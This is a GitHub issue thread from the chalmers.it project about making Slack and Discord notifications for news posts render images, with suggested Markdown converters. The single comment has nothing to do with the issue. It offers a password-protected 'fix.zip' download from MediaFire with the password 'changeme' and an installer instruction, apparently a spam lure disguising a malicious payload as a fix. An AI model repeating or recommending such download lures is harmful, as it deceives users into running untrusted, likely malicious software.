### ISSUE TITLE
As a Slack / Discord reader, I want images to be included in news post notifications, so that I can read them properly

### ISSUE THREAD

**Issue by GAsplund** [cthit/chalmers.it#119]
### 📝 Description

Currently, all posts are sent out in raw form from the Markdown that they are written in. This does not work well with Slack that only supports mrkdwn (their own format) and Discord that will for example not render images when directly inserted.

### ✅ Acceptance Criteria

- [ ] Images in a news post are shown in notifications
- [ ] Notifications do not take up an overwhelming amount of vertical space (in order to keep visual readability)

### 💡 Additional context

This could be solved using a standard Markdown to mrkdwn converter (such as [mack](https://www.npmjs.com/package/mack) or [slackify-markdown](https://www.npmjs.com/package/slackify-markdown)) but **it must be considered that these might make the notifications very long**. More testing is required.

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
